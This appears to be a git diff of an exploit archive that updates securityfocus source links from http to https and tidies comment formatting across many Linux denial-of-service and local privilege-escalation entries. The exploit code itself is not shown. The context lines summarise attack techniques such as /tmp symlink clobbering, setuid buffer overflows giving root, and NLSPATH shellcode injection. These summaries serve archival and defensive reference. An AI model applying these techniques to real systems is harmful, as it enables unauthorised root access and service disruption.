b/exploits/linux/dos/37538.py index 20ffc6d8f..0e102966c 100755 --- a/exploits/linux/dos/37538.py +++ b/exploits/linux/dos/37538.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54665/info +source: https://www.securityfocus.com/bid/54665/info ISC DHCP is prone to multiple denial-of-service vulnerabilities. diff --git a/exploits/linux/dos/37783.c b/exploits/linux/dos/37783.c index 4078f1954..ef67eb01c 100644 --- a/exploits/linux/dos/37783.c +++ b/exploits/linux/dos/37783.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55462/info +// source: https://www.securityfocus.com/bid/55462/info GNU glibc is prone to a remote integer-overflow vulnerability which leads to buffer overflow vulnerability. diff --git a/exploits/linux/dos/37897.html b/exploits/linux/dos/37897.html index b75e819f6..854f899ab 100644 
--- a/exploits/linux/dos/37897.html +++ b/exploits/linux/dos/37897.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55709/info +source: https://www.securityfocus.com/bid/55709/info The Midori Browser is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/38132.py b/exploits/linux/dos/38132.py index 1fd665ff2..c1c2a8ecc 100755 --- a/exploits/linux/dos/38132.py +++ b/exploits/linux/dos/38132.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/56939/info +source: https://www.securityfocus.com/bid/56939/info The Linux kernel is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/38365.txt b/exploits/linux/dos/38365.txt index 7bf85974c..a5a3a51c6 100644 --- a/exploits/linux/dos/38365.txt +++ b/exploits/linux/dos/38365.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/58319/info +source: https://www.securityfocus.com/bid/58319/info Squid is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/38392.txt b/exploits/linux/dos/38392.txt index 9c8564064..ae7bc69ca 100644 --- a/exploits/linux/dos/38392.txt +++ b/exploits/linux/dos/38392.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/58511/info +source: https://www.securityfocus.com/bid/58511/info MySQL and MariaDB are prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/38421.txt b/exploits/linux/dos/38421.txt index 61e3588d0..2e4d41033 100644 --- a/exploits/linux/dos/38421.txt +++ b/exploits/linux/dos/38421.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/58897/info +source: https://www.securityfocus.com/bid/58897/info Apache Subversion is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/38422.txt b/exploits/linux/dos/38422.txt index 05bb8104e..c3228a0ff 100644 --- a/exploits/linux/dos/38422.txt +++ b/exploits/linux/dos/38422.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/58898/info +source: https://www.securityfocus.com/bid/58898/info Apache Subversion is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/38465.txt b/exploits/linux/dos/38465.txt index 557895ea4..cca525245 100644 --- a/exploits/linux/dos/38465.txt +++ b/exploits/linux/dos/38465.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/59055/info +source: https://www.securityfocus.com/bid/59055/info The Linux kernel is prone to multiple local denial-of-service vulnerabilities. diff --git a/exploits/linux/dos/38589.c b/exploits/linux/dos/38589.c index 9a72f0192..821083e77 100644 --- a/exploits/linux/dos/38589.c +++ b/exploits/linux/dos/38589.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/60586/info +source: https://www.securityfocus.com/bid/60586/info The Linux Kernel is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/38622.txt b/exploits/linux/dos/38622.txt index 1e0c3c55b..6c3f5ee89 100644 --- a/exploits/linux/dos/38622.txt +++ b/exploits/linux/dos/38622.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/60876/info +source: https://www.securityfocus.com/bid/60876/info libvirt is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/38778.txt b/exploits/linux/dos/38778.txt index c4fd959ba..3f21a605f 100644 --- a/exploits/linux/dos/38778.txt +++ b/exploits/linux/dos/38778.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/62647/info +source: https://www.securityfocus.com/bid/62647/info Blue Coat ProxySG and Security Gateway OS are prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/38854.sh b/exploits/linux/dos/38854.sh index 3b3be25b1..69121a9db 100755 --- a/exploits/linux/dos/38854.sh +++ b/exploits/linux/dos/38854.sh 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/64048/info +source: https://www.securityfocus.com/bid/64048/info Net-SNMP is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/38909.txt b/exploits/linux/dos/38909.txt index 9994dda54..00efbfe18 100644 --- a/exploits/linux/dos/38909.txt +++ b/exploits/linux/dos/38909.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/64478/info +source: https://www.securityfocus.com/bid/64478/info DenyHosts is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/40695.c b/exploits/linux/dos/40695.py old mode 100644 new mode 100755 similarity index 100% rename from exploits/linux/dos/40695.c rename to exploits/linux/dos/40695.py diff --git a/exploits/linux/dos/40696.c b/exploits/linux/dos/40696.py old mode 100644 new mode 100755 similarity index 100% rename from exploits/linux/dos/40696.c rename to exploits/linux/dos/40696.py diff --git a/exploits/linux/dos/40697.c b/exploits/linux/dos/40697.py old mode 100644 new mode 100755 similarity index 100% rename from exploits/linux/dos/40697.c rename to exploits/linux/dos/40697.py diff --git a/exploits/linux/dos/41350.c b/exploits/linux/dos/41350.c index 8ea9cac44..e76612a37 100644 --- a/exploits/linux/dos/41350.c +++ b/exploits/linux/dos/41350.c @@ -1,3 +1,4 @@ +/* ##### #Exploit Title: CentOS7 Kernel Crashing by rsyslog daemon vulnerability | DOS on CentOS7 #Exploit Author: Hosein Askari (FarazPajohan) @@ -15,6 +16,8 @@ # ~~~#exploit.out -T3 -h -p [514,514] // You can run this exploit on both "514 TCP/UDP" # #Exploit Code : +*/ + #include #include #include diff --git a/exploits/linux/dos/42932.c b/exploits/linux/dos/42932.c index 7fe1f6812..b793a53c1 100644 --- a/exploits/linux/dos/42932.c +++ b/exploits/linux/dos/42932.c @@ -1,3 +1,4 @@ +/* # Exploit Title: Linux Kernel<4.14.rc3 Local Denial of Service # Date: 2017-Oct-02 # Exploit Author: Wang Chenyu (Nanyang Technological University) 
@@ -13,6 +14,8 @@ nlh->nlmsg_len. POC: +*/ + #include #include #include diff --git a/exploits/linux/dos/45919.c b/exploits/linux/dos/45919.c index 0933b6853..aa31e5f9b 100644 --- a/exploits/linux/dos/45919.c +++ b/exploits/linux/dos/45919.c @@ -1,3 +1,4 @@ +/* # Exploit Title: Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp kernel pointer # Google Dork: - # Date: 2018-11-20 @@ -8,6 +9,7 @@ # Tested on: 4.8.0-36-generic #36~16.04.1-Ubuntu SMP Sun Feb 5 09:39:57 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux # CVE: 2017-7558 # Category: Local +*/ /* * [ Briefs ] diff --git a/exploits/linux/dos/7100.pl b/exploits/linux/dos/7100.pl index 98c206369..82c6b77f2 100755 --- a/exploits/linux/dos/7100.pl +++ b/exploits/linux/dos/7100.pl @@ -7,7 +7,7 @@ # # Refer: # http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2292 -# http://www.securityfocus.com/bid/29212/discuss +# https://www.securityfocus.com/bid/29212/discuss # # # To run this exploit on MS Windows replace "#!usr/bin/perl -w" with "#!Installation_path_for_perl -w" diff --git a/exploits/linux/local/144.c b/exploits/linux/local/144.c index c0b2c9173..35c31fb44 100644 --- a/exploits/linux/local/144.c +++ b/exploits/linux/local/144.c @@ -1,10 +1,10 @@ - #include - #include - #include +#include +#include +#include - #define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem." - #define START 1 - #define END 33000 +#define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem." +#define START 1 +#define END 33000 int main(int argc, char **argv) { diff --git a/exploits/linux/local/15074.sh b/exploits/linux/local/15074.sh index 511c3e0dc..573997652 100755 --- a/exploits/linux/local/15074.sh +++ b/exploits/linux/local/15074.sh @@ -1,4 +1,4 @@ -# source: http://www.securityfocus.com/bid/43084/info +# source: https://www.securityfocus.com/bid/43084/info #!/bin/sh # by fuzz. For Anux inc. # diff --git a/exploits/linux/local/15344.c b/exploits/linux/local/15344.c index 2eccf6f78..e75d771e5 100644 --- a/exploits/linux/local/15344.c 
+++ b/exploits/linux/local/15344.c @@ -1,4 +1,4 @@ -// source: http://www.securityfocus.com/bid/44242/info +// source: https://www.securityfocus.com/bid/44242/info /* * CVE-2010-2963 * Arbitrary write memory write via v4l1 compat ioctl. diff --git a/exploits/linux/local/19070.txt b/exploits/linux/local/19070.txt index f2e1264cb..447842b5a 100644 --- a/exploits/linux/local/19070.txt +++ b/exploits/linux/local/19070.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/77/info +source: https://www.securityfocus.com/bid/77/info liloconfig-color creates the file /tmp/reply insecurely and follows symbolic links. An attacker can create a symbolic link from /tmp/reply to any file and wait for root to run the program. This will clober the target file. The file created has permissions -rw-r--r--. diff --git a/exploits/linux/local/19071.txt b/exploits/linux/local/19071.txt index db5076469..eae68f4b3 100644 --- a/exploits/linux/local/19071.txt +++ b/exploits/linux/local/19071.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/78/info +source: https://www.securityfocus.com/bid/78/info makebootdisk creates the file /tmp/return insecurely and follows symbolic links. An attacker can create a symbolic link from /tmp/return to any file and wait for root to run the program. This will clober the target file. The file created has permissions -rw-r--r--. diff --git a/exploits/linux/local/19072.txt b/exploits/linux/local/19072.txt index cd5c0f0c3..4161985ee 100644 --- a/exploits/linux/local/19072.txt +++ b/exploits/linux/local/19072.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/80/info +source: https://www.securityfocus.com/bid/80/info The named daemon will dump the named database to /var/tmp/named_dump.db when it receives a SIGINT signal. It does not check for symbolic links while diff --git a/exploits/linux/local/19073.txt b/exploits/linux/local/19073.txt index abc950cdf..8040929c1 100644 --- a/exploits/linux/local/19073.txt 
+++ b/exploits/linux/local/19073.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/81/info +source: https://www.securityfocus.com/bid/81/info netconfig creates the file /tmp/tmpmsg insecurely and follows symbolic links. An attacker can create a symbolic link from /tmp/tmpmsg to any file and wait for root to run the program. This will clober the target file. The file created has permissions -rw-r--r--. diff --git a/exploits/linux/local/19074.txt b/exploits/linux/local/19074.txt index 2e1d174e9..e7a4cc7bc 100644 --- a/exploits/linux/local/19074.txt +++ b/exploits/linux/local/19074.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/82/info +source: https://www.securityfocus.com/bid/82/info pkgtool creates the file /tmp/reply insecurely and follows symbolic links. An attacker can create a symbolic link from /tmp/reply to any file and wait for root to run the program. This will clober the target file. The file created has permissions -rw-rw-rw-. diff --git a/exploits/linux/local/19077.c b/exploits/linux/local/19077.c index 5cf062a98..7561cebeb 100644 --- a/exploits/linux/local/19077.c +++ b/exploits/linux/local/19077.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/86/info +// source: https://www.securityfocus.com/bid/86/info A buffer overflow resides in 'dip-3.3.7o' and derived programs. This is a problem only on systems where 'dip' is installed setuid. The culpable code is an 'sprintf()' in line 192 in 'main.c': diff --git a/exploits/linux/local/19078.c b/exploits/linux/local/19078.c index 2a7586a04..deb0c0f4b 100644 --- a/exploits/linux/local/19078.c +++ b/exploits/linux/local/19078.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/86/info +// source: https://www.securityfocus.com/bid/86/info A buffer overflow resides in 'dip-3.3.7o' and derived programs. This is a problem only on systems where 'dip' is installed setuid. The culpable code is an 'sprintf()' in line 192 in 'main.c': 
diff --git a/exploits/linux/local/19080.txt b/exploits/linux/local/19080.txt index 76c699428..e7f4ef2c5 100644 --- a/exploits/linux/local/19080.txt +++ b/exploits/linux/local/19080.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/94/info +source: https://www.securityfocus.com/bid/94/info /usr/bin/suidexec will execute arbitrary commands as root, as soon as just _one_ suid root shell script can be found diff --git a/exploits/linux/local/19095.txt b/exploits/linux/local/19095.txt index 9d12b3ec5..46707348d 100644 --- a/exploits/linux/local/19095.txt +++ b/exploits/linux/local/19095.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/119/info +source: https://www.securityfocus.com/bid/119/info A vulnerability in bash may allow inadvertently running commands embedded in the path to the currently working directory. diff --git a/exploits/linux/local/19106.c b/exploits/linux/local/19106.c index fe9c2d437..5bab3daa8 100644 --- a/exploits/linux/local/19106.c +++ b/exploits/linux/local/19106.c @@ -1,4 +1,5 @@ -/* source: http://www.securityfocus.com/bid/129/info +/* +source: https://www.securityfocus.com/bid/129/info Rdist is a program to maintain identical copies of files over multiple hosts. It preserves the owner, group, mode, and mtime of files if possible and can update programs that are executing. Rdist reads commands from distfile to direct the updating of files and/or directories. diff --git a/exploits/linux/local/19122.txt b/exploits/linux/local/19122.txt index 07c2d9cdb..bc8c600ba 100644 --- a/exploits/linux/local/19122.txt +++ b/exploits/linux/local/19122.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/155/info +source: https://www.securityfocus.com/bid/155/info Due to the way /bin/login behaves when a /etc/group file is not present under Slackware's version of the password shadowing suite, users who log in while this file is not present will be given uid and gid 0. This will allow them unrestricted access to the machine. This vulnerability is present in all versions of Slackware which have shadow passwords, up to and including 3.5 diff --git a/exploits/linux/local/19125.txt b/exploits/linux/local/19125.txt index 20affd5f0..740d434dd 100644 --- a/exploits/linux/local/19125.txt +++ b/exploits/linux/local/19125.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/159/info +source: https://www.securityfocus.com/bid/159/info Oracle8 is an enterprise level database. As part of the Internet Agent option installation process it installs the file $ORACLE_HOME/bin/oratclsh as suid root. oratclsh is a TCL application that provides full access to TCL. oratclsh gives anyone the ability to execute arbitrary TCL commands as root. diff --git a/exploits/linux/local/19142.sh b/exploits/linux/local/19142.sh index 17e3347ab..bc8009a65 100755 --- a/exploits/linux/local/19142.sh +++ b/exploits/linux/local/19142.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/170/info +source: https://www.securityfocus.com/bid/170/info A number of security file access security vulnerabilities in suid programs that are part of Oracle may be exploited to obtain the privileges of the 'oracle' user and full access to the database system. Only the Unix version of Oracle is vulnerable. diff --git a/exploits/linux/local/19146.sh b/exploits/linux/local/19146.sh index 8c7cb2ff0..d9b1ff47a 100755 --- a/exploits/linux/local/19146.sh +++ b/exploits/linux/local/19146.sh 
@@ -1,4 +1,4 @@ -#source: http://www.securityfocus.com/bid/186/info +#source: https://www.securityfocus.com/bid/186/info # #A vulnerability exists within the DataLynx's suGuard program which allows a local attacker to gain administrative privilege by exploiting poor use of the /tmp directory and poor programming. diff --git a/exploits/linux/local/19240.c b/exploits/linux/local/19240.c index 70126797c..907fe8ab6 100644 --- a/exploits/linux/local/19240.c +++ b/exploits/linux/local/19240.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/300/info +// source: https://www.securityfocus.com/bid/300/info KMail is a mail user agent that comes with the kdenetwork package, part of the K Desktop Environment. A vulnerability in the way KMail creates temporary files to save attachments may allow malicious users to overwrite any file that user running KMail has permissions to. diff --git a/exploits/linux/local/19243.txt b/exploits/linux/local/19243.txt index d9ece6485..12d023e71 100644 --- a/exploits/linux/local/19243.txt +++ b/exploits/linux/local/19243.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/305/info +source: https://www.securityfocus.com/bid/305/info The man command created a temporary file under /tmp with a predictable name and is willing to follow symbolic links. This may allow malicious local users to create arbitrarily named files. diff --git a/exploits/linux/local/19249.c b/exploits/linux/local/19249.c index 15e368321..559911d75 100644 --- a/exploits/linux/local/19249.c +++ b/exploits/linux/local/19249.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/311/info +source: https://www.securityfocus.com/bid/311/info XCmail is an X11 mail client for linux. diff --git a/exploits/linux/local/19254.c b/exploits/linux/local/19254.c index 2f01b9ee8..a26ff7736 100644 --- a/exploits/linux/local/19254.c +++ b/exploits/linux/local/19254.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/319/info +source: https://www.securityfocus.com/bid/319/info Linux gnuplot 3.5 is shipped with S.u.S.E. Linux 5.2 and installed suid root by default. There is a buffer overflow vulnerability present in gnuplot which allows for users to obtain root access locally. */ diff --git a/exploits/linux/local/19255.txt b/exploits/linux/local/19255.txt index 484e6a7ff..50c1811a9 100644 --- a/exploits/linux/local/19255.txt +++ b/exploits/linux/local/19255.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/320/info +source: https://www.securityfocus.com/bid/320/info A vulnerability in PAM allows local malicious users to brute force passwords via the su command without any logging of their activity. diff --git a/exploits/linux/local/19256.c b/exploits/linux/local/19256.c index 0583ce979..8a0821ad8 100644 --- a/exploits/linux/local/19256.c +++ b/exploits/linux/local/19256.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/324/info +// source: https://www.securityfocus.com/bid/324/info The netstd package, included with the Debian GNU/Linux distribution is vulnerable to two buffer overflow attacks. The first is in the bootp server, the second in the FTP client. diff --git a/exploits/linux/local/19257.c b/exploits/linux/local/19257.c index 856a2d614..ec1137912 100644 --- a/exploits/linux/local/19257.c +++ b/exploits/linux/local/19257.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/326/info +// source: https://www.securityfocus.com/bid/326/info There is a symlink vulnerability known to exist under most modern linux and NetBSD distributions. It involves /tmp/.X11-unix and the tendency to follow to/overwrite the file pointed to if a symlink. It may be possible for a regular user to write arbritrary data to a file they normally have no write access to resulting in a root compromise. diff --git a/exploits/linux/local/19259.c b/exploits/linux/local/19259.c index a0163e164..7d184e8d3 100644 
--- a/exploits/linux/local/19259.c +++ b/exploits/linux/local/19259.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/328/info +// source: https://www.securityfocus.com/bid/328/info The PLP Line Printer Control program, shipped with S.u.S.E. 5.2 is vulnerable to a local remote buffer overflow. You can determine whether you're vulnerable or not by typing 'lpc'. If you're presented with an lpc version number, you're vulnerable. The consequences of lpc exploitation are root access for a local user. diff --git a/exploits/linux/local/19270.c b/exploits/linux/local/19270.c index d38398a85..a0e8a7398 100644 --- a/exploits/linux/local/19270.c +++ b/exploits/linux/local/19270.c @@ -1,4 +1,4 @@ -// source: http://www.securityfocus.com/bid/342/info +// source: https://www.securityfocus.com/bid/342/info // // After the first super buffer overflow vulnerability was discovered, another appeared shortly after. This vulnerability exists when the syslog option is enabled. The overflow is in the file error.c, in the Error() function where the buf[MAXPRINT] buffer is used with no bounds checking. The consequences of this are local root compromise. // diff --git a/exploits/linux/local/19279.sh b/exploits/linux/local/19279.sh index d169d8505..65cfc363e 100755 --- a/exploits/linux/local/19279.sh +++ b/exploits/linux/local/19279.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/354/info +source: https://www.securityfocus.com/bid/354/info Abuse is a game that is included with RedHat Linux 2.1 in the games package. The console version, abuse.console, is suid-root and will load the program sndrv as root without checking for an absolute pathname. This means that sndrv can be substituted in another directory by a regular user and used to locally execute arbitrary code on the target machine. Consequences are a root compromise. diff --git a/exploits/linux/local/19281.c b/exploits/linux/local/19281.c index 1cfa84300..43e4232ec 100644 --- a/exploits/linux/local/19281.c 
+++ b/exploits/linux/local/19281.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/362/info +// source: https://www.securityfocus.com/bid/362/info xosview is an X11 system monitoring application that ships with RedHat 5.1 installed setuid root. A buffer overflow vulnerability was found in Xrm.cc, the offending code listed below: diff --git a/exploits/linux/local/19283.c b/exploits/linux/local/19283.c index 88320375f..bb24799c1 100644 --- a/exploits/linux/local/19283.c +++ b/exploits/linux/local/19283.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/364/info +source: https://www.securityfocus.com/bid/364/info superprobe is an program supplied with XFree86 that helps determine video hardware. It is shipped with Slackware Linux 3.1 and is installed setuid root. There is an exploitable strcpy buffer overflow in the TestChip() function which allows for a trivial local root compromise. */ diff --git a/exploits/linux/local/19284.c b/exploits/linux/local/19284.c index 9b5eb16e4..13bb2e071 100644 --- a/exploits/linux/local/19284.c +++ b/exploits/linux/local/19284.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/365/info +// source: https://www.securityfocus.com/bid/365/info Armidale Software's Yapp Conferencing System is vulnerable to an environment variable related buffer overflow vulnerability in (at least) the Linux version. The consequence of the vulnerability being exploited is a local root compromise. diff --git a/exploits/linux/local/19285.txt b/exploits/linux/local/19285.txt index b9480e69b..94053157f 100644 --- a/exploits/linux/local/19285.txt +++ b/exploits/linux/local/19285.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/369/info +source: https://www.securityfocus.com/bid/369/info In Slackware Linux 3.1 and 3.2, the version of color xterm included is vulnerable to a buffer overflow attack that allows for a local user to gain root access. 
diff --git a/exploits/linux/local/19286.c b/exploits/linux/local/19286.c index 38c9dd496..f8f2eaaf3 100644 --- a/exploits/linux/local/19286.c +++ b/exploits/linux/local/19286.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/369/info +source: https://www.securityfocus.com/bid/369/info In Slackware Linux 3.1 and 3.2, the version of color xterm included is vulnerable to a buffer overflow attack that allows for a local user to gain root access. */ diff --git a/exploits/linux/local/19302.c b/exploits/linux/local/19302.c index f6f53229e..107508c30 100644 --- a/exploits/linux/local/19302.c +++ b/exploits/linux/local/19302.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/379/info +// source: https://www.securityfocus.com/bid/379/info There is a serious vulnerability in linux libc affecting all Linux distributions using libc 5.2.18 and below. The vulnerability is centered around the NLSPATH environment variable. Through exporting the oversized and shell-code including buffer to the environment variable NLSPATH, it is possible to exploit any setuid root program that's based on libc [almost all] and gain root access on the machine. diff --git a/exploits/linux/local/19305.c b/exploits/linux/local/19305.c index 8df8f82f6..5599c8536 100644 --- a/exploits/linux/local/19305.c +++ b/exploits/linux/local/19305.c @@ -1,4 +1,4 @@ -// source: http://www.securityfocus.com/bid/383/info +// source: https://www.securityfocus.com/bid/383/info // // Similar to the mh vulnerability, a buffer overflow exists in the version of msgchk shipped with RedHat Linux 5.0. The vulnerability allows a user to execute arbritrary commands as root to compromise superuser access. // diff --git a/exploits/linux/local/19311.c b/exploits/linux/local/19311.c index c744b8185..14bafb4fa 100644 --- a/exploits/linux/local/19311.c +++ b/exploits/linux/local/19311.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/393/info +// source: https://www.securityfocus.com/bid/393/info A buffer overrun exists in the /bin/mailx program. This program was originally developed as part of BSD, and is available on many Unix systems. By supplying a long, well crafted buffer as the username argument, an attacker can use it to execuate arbitrary code. On some systems, this will result in the ability to execute code as group mail. diff --git a/exploits/linux/local/19312.c b/exploits/linux/local/19312.c index c55bf1a96..96819694b 100644 --- a/exploits/linux/local/19312.c +++ b/exploits/linux/local/19312.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/393/info +// source: https://www.securityfocus.com/bid/393/info A buffer overrun exists in the /bin/mailx program. This program was originally developed as part of BSD, and is available on many Unix systems. By supplying a long, well crafted buffer as the username argument, an attacker can use it to execuate arbitrary code. On some systems, this will result in the ability to execute code as group mail. diff --git a/exploits/linux/local/19314.c b/exploits/linux/local/19314.c index 4796e35f3..b11214cce 100644 --- a/exploits/linux/local/19314.c +++ b/exploits/linux/local/19314.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/398/info +// source: https://www.securityfocus.com/bid/398/info It is possible to cause a denial of service (remote and local) through generating old, obscure kernel messages (not terminated with \n) in klogd. The problem exists because of a buffer overflow in the klogd handling of kernel messages. It is possible to gain local root access through stuffing shellcode into printk() messages which contain user-controllable variables (eg, filenames). What makes this problem strange, however, is that it was fixed two years ago. Two of the most mainstream linux distributions (Slackware Linux and RedHat Linux), up until recently, are known to have been shipping with the very old vulnerable version. Fixes and updates were released promptly. There is no data on other distributions. diff --git a/exploits/linux/local/19315.c b/exploits/linux/local/19315.c index da61a32f9..34babef61 100644 --- a/exploits/linux/local/19315.c +++ b/exploits/linux/local/19315.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/398/info +// source: https://www.securityfocus.com/bid/398/info It is possible to cause a denial of service (remote and local) through generating old, obscure kernel messages (not terminated with \n) in klogd. The problem exists because of a buffer overflow in the klogd handling of kernel messages. It is possible to gain local root access through stuffing shellcode into printk() messages which contain user-controllable variables (eg, filenames). What makes this problem strange, however, is that it was fixed two years ago. Two of the most mainstream linux distributions (Slackware Linux and RedHat Linux), up until recently, are known to have been shipping with the very old vulnerable version. Fixes and updates were released promptly. There is no data on other distributions. diff --git a/exploits/linux/local/19360.c b/exploits/linux/local/19360.c index aa47e1665..8064f9e52 100644 
--- a/exploits/linux/local/19360.c +++ b/exploits/linux/local/19360.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/475/info +// source: https://www.securityfocus.com/bid/475/info A buffer overflow is present in linux libc 5.4.32 and below that allows a user to obtain local root access under some conditions. The overflow is in the function vsyslog() and exploitable through the suid root program su, which passes the arg that exceeds boundaries directly to the function. The consequences of this problem being exploited that particular way are allowing a user to execute arbitrary code and gain root access. diff --git a/exploits/linux/local/19370.c b/exploits/linux/local/19370.c index ccb849e4d..917a92847 100644 --- a/exploits/linux/local/19370.c +++ b/exploits/linux/local/19370.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/488/info +// source: https://www.securityfocus.com/bid/488/info Accelerated-X, also known as Accel-X, is a popular commercial X server available from Xi Graphics. The servers are normally installed setuid root, and contain multiple buffer overflow vulnerabilities. These vulnerabilities were found in the passing of oversized command line arguments to the servers causing the stack to be overwritten and the flow of execution for the Xserver changed. Two of these vulnerabilities is known to be related to the -query argument and the DISPLAY environment variable, upon neither of which is bounds checking performed. The consequence of these vulnerabilities being exploited is local root compromise. diff --git a/exploits/linux/local/19371.c b/exploits/linux/local/19371.c index e9d7c1f4e..d4525e122 100644 --- a/exploits/linux/local/19371.c +++ b/exploits/linux/local/19371.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/490/info +// source: https://www.securityfocus.com/bid/490/info VMWare is virtual machine software produced by VMWare inc. VMWare version 1.0.1 for Linux is vulnerable to a buffer overflow attack. Since VMWare is installed with binaries that are setuid root, local users can exploit the hole allowing for arbitrary code to be executed as root. The consequences are a local root compromise. diff --git a/exploits/linux/local/19373.c b/exploits/linux/local/19373.c index 36ea2e1e5..8746874a5 100644 --- a/exploits/linux/local/19373.c +++ b/exploits/linux/local/19373.c @@ -1,4 +1,4 @@ -// source: http://www.securityfocus.com/bid/496/info +// source: https://www.securityfocus.com/bid/496/info // // Lsof is an open file management utility included with many linux distributions. When run setuid root or setgid kmem, it is subject to a buffer overflow that can lead to regular users gaining root priveleges. // diff --git a/exploits/linux/local/19374.c b/exploits/linux/local/19374.c index 303e613a5..d7133d1ee 100644 --- a/exploits/linux/local/19374.c +++ b/exploits/linux/local/19374.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/496/info +// source: https://www.securityfocus.com/bid/496/info Lsof is an open file management utility included with many linux distributions. When run setuid root or setgid kmem, it is subject to a buffer overflow that can lead to regular users gaining root priveleges. diff --git a/exploits/linux/local/19384.c b/exploits/linux/local/19384.c index 511b80b61..826d8e23b 100644 --- a/exploits/linux/local/19384.c +++ b/exploits/linux/local/19384.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/508/info +// source: https://www.securityfocus.com/bid/508/info The LPRng software is an enhanced, extended, and portable version of the Berkeley LPR software (the standard UNIX printer spooler) that ships with Debian GNU/Linux. When root controls the print queue, the authentication that is used is based on whether the client source port connecting to lpd is privileged or not. Apparently, lpd does not check the source port properly, and it is possible for any local user to control the print queue with a modified client. The consequences of this vulnerability being exploited is a compromise of print queue control. diff --git a/exploits/linux/local/19419.c b/exploits/linux/local/19419.c index e4113bf15..ff2eda0c8 100644 --- a/exploits/linux/local/19419.c +++ b/exploits/linux/local/19419.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/523/info +source: https://www.securityfocus.com/bid/523/info This vulnerability has to do with the division of the address space between a user process and the kernel. Because of a bug, if you select a non-standard memory configuration, sometimes user level processes may be given access upto 252Mb of memory that are really part of the kernel. This allows the process to first search for its memory descriptor and then extend it to cover the rest of the kernel memory. It can then search for a task_struct and modify it so its uid is zero (root). This vulnerability is very obscure, only works on that version of linux, and only if you select a non-standard memory configuration. diff --git a/exploits/linux/local/19422.txt b/exploits/linux/local/19422.txt index aeb60e5e5..544b72edf 100644 --- a/exploits/linux/local/19422.txt +++ b/exploits/linux/local/19422.txt 
